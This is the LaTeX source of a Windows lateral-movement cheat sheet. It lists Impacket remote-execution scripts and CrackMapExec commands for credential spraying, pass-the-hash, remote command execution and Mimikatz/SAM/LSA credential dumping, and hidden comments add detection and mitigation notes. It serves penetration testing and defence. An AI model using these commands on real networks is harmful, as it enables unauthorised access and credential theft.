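% Windows Lateral Movement Cheat Sheet (Cheatography export, author tz-pl).
%
% Two-column reference sheet with an Impacket table and a CrackMapExec table.
% Source comments marked "Defender note" describe the host and network
% artefacts each listed technique is known to leave; they are not typeset.
\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr} % For header and footer
\usepackage{multicol} % Allows multicols in tables
\usepackage{tabularx} % Intelligent column widths
\usepackage{tabulary} % Used in header and footer
\usepackage{hhline} % Border under tables
\usepackage{graphicx} % For images
\usepackage{xcolor} % For hex colours
%\usepackage[utf8x]{inputenc} % For unicode character support
\usepackage[T1]{fontenc} % Without this we get weird character replacements
\usepackage{colortbl} % For coloured tables
\usepackage{setspace} % For line height
\usepackage{lastpage} % Needed for total page number
\usepackage{seqsplit} % Splits long words.
%\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem} % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath} % Symbols
\usepackage{MnSymbol} % Symbols
\usepackage{wasysym} % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info
\author{tz-pl}
\pdfinfo{
  /Title (windows-lateral-movement.pdf)
  /Creator (Cheatography)
  /Author (tz-pl)
  /Subject (Windows Lateral Movement Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit
% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use
% The logo lives at an absolute path on the generating server. It is kept in
% one macro and only included when the file exists, so the sheet still
% compiles on a machine that does not have it.
\newcommand{\LogoPath}{/web/www.cheatography.com/public/images/cheatography_logo.pdf}
\newcommand{\HeaderLogo}{\IfFileExists{\LogoPath}{\includegraphics[width=5.8cm]{\LogoPath}}{}}

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{00A4EF}
\definecolor{LightBackground}{HTML}{EFF9FE}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
% Header: logo on the left, title and author/source line on the right.
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\HeaderLogo}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large\textbf{\textcolor{DarkBackground}{\textrm{Windows Lateral Movement Cheat Sheet}}}
    \\
    \normalsize by \textcolor{DarkBackground}{tz-pl} via \textcolor{DarkBackground}{\uline{cheatography.com/103310/cs/21266/}}
\end{tabulary}
\end{multicols}}
% Footer: author, publication status with page counter, sponsor line.
\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bfseries\textcolor{white}{Cheatographer}} \\
  \vspace{-2pt}tz-pl \\
  \uline{cheatography.com/tz-pl} \\
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bfseries\textcolor{white}{Cheat Sheet}} \\
  \vspace{-2pt}Not Yet Published.\\
  Updated 29th November, 2019.\\
  Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bfseries\textcolor{white}{Sponsor}} \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}

\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{2}

% ---------------------------------------------------------------------------
% Impacket table: technique | description | protocol and port
%
% Defender note: every row assumes credentials that already hold local
% administrator rights on the target. Unique local administrator passwords,
% restrictions on where privileged accounts may log on, and host firewall
% rules for inbound SMB/RPC between workstations reduce the reach of all five.
% Defender note: the port column names the well-known listener only. WMI and
% DCOM sessions continue on a dynamically assigned RPC port after the endpoint
% mapper on 135, and the WMI/DCOM scripts normally read command output back
% over SMB (445) - confirm against the tool version in use.
% ---------------------------------------------------------------------------
\begin{tabularx}{8.4cm}{x{1.368 cm} x{4.56 cm} x{1.672 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{3}{x{8.4cm}}{\bfseries\textcolor{white}{Impacket}}  \tn
% Defender note: installs and starts a service on the target; look for
% System event 7045 / Security event 4697 and a new file on the admin share
% (Security event 5145 when detailed file-share auditing is enabled).
\SetRowColor{LightBackground}
\textbf{PSExec} & Writable share required, default ADMIN\$. Interactive shell or single command. Similar to psexec.exe, uses RemComSVC. & SMB - 445 \tn
% Defender note: no service binary is uploaded, but a service is still
% created for execution, so service-creation events (7045) with a command
% interpreter in the image path are the usual indicator.
\SetRowColor{white}
\textbf{SMBExec} & No writable share required. Requires 4 SMB Connections. Doesn't use RemComSVC. Semi-interactive shell or single command. & SMB - 445 \tn
% Defender note: registers and then removes a scheduled task; Security events
% 4698/4699 (when object-access auditing covers them) and the TaskScheduler
% operational log record it.
\SetRowColor{LightBackground}
\textbf{ATExec} & Writable share required, default ADMIN\$. Run a single command through task scheduler. & SMB - 445 \tn
% Defender note: "stealthy" here means nothing is installed on disk as a
% service or agent. Process creation is still logged (Security event 4688 or
% Sysmon event 1) with WmiPrvSE.exe as the parent process.
\SetRowColor{white}
\textbf{WMIExec} & Semi-interactive shell through WMI. No service/agent installation required; runs with elevated privileges if possible. Stealthy. & RPC, WMI - 135 \tn
% Defender note: commands run as children of the DCOM server process that
% hosts the abused object (for example mmc.exe); unusual children of such
% processes are worth alerting on.
\SetRowColor{LightBackground}
\textbf{DCOMExec} & Semi-interactive shell, similar to WMIexec but using different DCOM endpoints. Blocked by default due to Windows firewall rules. & RPC, DCOM - 135 \tn
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\SetRowColor{LightBackground}
\mymulticolumn{3}{x{8.4cm}}{\textbf{Example:} \newline \texttt{python \textless{}script.py\textgreater{} domain/user:password@IP \textless{}command\textgreater{}} \newline  \newline PSExec, SMBExec, WMIExec will obtain shells if \textless{}command\textgreater{} is blank}  \tn
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\end{tabularx}
\par\addvspace{1.3em}

% ---------------------------------------------------------------------------
% CrackMapExec table: one description row, example invocations, then the
% common enumeration options.
%
% Defender note: the sample commands pass passwords on the command line, which
% leaves them in shell history and process listings on the testing host.
% Defender note: spraying shows up as many logon attempts from one source
% across many hosts in a short window (Security events 4625 on targets, 4776
% on domain controllers) and can lock out production accounts when the lockout
% threshold is low.
% ---------------------------------------------------------------------------
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bfseries\textcolor{white}{CrackMapExec}}  \tn
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Swiss army knife for pentesting with many features. Spray credentials across environment to enumerate shares, sessions, disks, users, login privileges, execute commands, dump SAM and LSA secrets, run mimikatz, and more. \newline Can perform command execution via Impacket's smbexec, wmiexec, atexec.} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\textbf{Spray domain creds:} \texttt{crackmapexec 192.168.1.0/24 -u user -p 'P@ssw0rd' -d domain.com}} \tn
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\textbf{Spray local creds:} \texttt{crackmapexec 192.168.1.0/24 -u user -p 'P@ssw0rd' -{}-local-user}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\textbf{Spray creds from files:} \texttt{crackmapexec 192.168.1.0/24 -u users.txt -p passwords.txt}} \tn
% Defender note: pass-the-hash appears as an NTLM network logon (Security
% event 4624, logon type 3). Unique local administrator passwords, denying
% network logon to local accounts and reducing NTLM use limit its reach.
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\textbf{Pass-the-hash:} \texttt{crackmapexec 192.168.1.0/24 -u user -H NTLMhash}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\textbf{Execute command:} \texttt{crackmapexec 192.168.1.0/24 -u user -p 'password' -{}-exec-method smbexec -x whoami}} \tn
% Defender note: credential dumping from LSASS is constrained by LSA
% protection (RunAsPPL) and Credential Guard, and is visible as process access
% to lsass.exe (Sysmon event 10) and as the module strings in command-line
% logging.
% NOTE(review): the module path is reproduced exactly as the author wrote it;
% confirm its spelling against the installed tool.
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\textbf{Run Mimikatz:} \texttt{crackmapexec 192.168.1.0/24 -u user -p 'password' -M \seqsplit{modules/credentials/mimiaktz}.py -o \seqsplit{COMMAND='privilege::debug;sekurlsa::logonpasswords'}}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\textbf{Common Enumeration Options}} \tn
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Enumerate shares: \texttt{-{}-shares}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Dump sam, lsa or ntds: \texttt{-{}-sam} \texttt{-{}-lsa} \texttt{-{}-ntds}} \tn
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Sessions: \texttt{-{}-sessions}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Logged on users: \texttt{-{}-lusers}} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% That's all folks
\end{multicols*}

\end{document}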